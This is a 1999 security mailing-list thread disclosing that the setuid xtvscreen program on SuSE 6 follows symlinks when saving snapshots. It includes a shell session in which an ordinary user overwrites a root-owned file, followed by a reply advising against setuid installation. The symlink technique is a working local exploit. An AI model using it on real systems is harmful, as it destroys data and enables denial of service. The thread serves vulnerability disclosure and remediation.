xtvscreen.suse6.txt

`Date: Thu, 18 Feb 1999 15:54:24 +0000  
From: Andre Cruz <[email protected]>  
To: [email protected]  
Subject: xtvscreen and suse 6  
  
You can use xtvscreen to overwrite any file on the system.  
Xtvscreen has a function to capture a snapshot and will write it as  
pic000.pnm, pic001.pnm, etc in it's working directory. It follows  
symlinks.  
root@korn:/tmp > ls -l exp  
-rw-r--r-- 1 root root 4 Feb 18 15:42 exp  
edevil@korn:~ > ln -s /tmp/exp pic000.pnm  
edevil@korn:~ > xtvscreen  
Sound mixer initialized !  
Using Visual TrueColor  
msize: 0x00640000  
/*  
Start->Capture goes here  
Start->Snapshot goes here */  
[1]+ Stopped xtvscreen  
edevil@korn:~ > cd /tmp  
edevil@korn:/tmp > ls -l exp  
-rw-r--r-- 1 root root 453135 Feb 18 15:47 exp  
edevil@korn:/tmp >  
I don't know how to write arbitrary data to the file but it can be used  
for DoS.  
If this is already known I'm sorry.  
  
---  
Andre Cruz  
[email protected]  
  
------------------------------------------------------------------------  
  
Date: Thu, 18 Feb 1999 22:51:00 +0000  
From: Alan Cox <[email protected]>  
To: [email protected]  
Subject: Re: xtvscreen and suse 6  
  
> You can use xtvscreen to overwrite any file on the system.  
> Xtvscreen has a function to capture a snapshot and will write it as  
  
Xtvscreen really should not be installed setuid. The only reason to do so  
is because something has to tell the capture card where the frame buffer is.  
This should be the Xserver (patched), or one of the small helper applications  
available for this.  
  
Alan  
`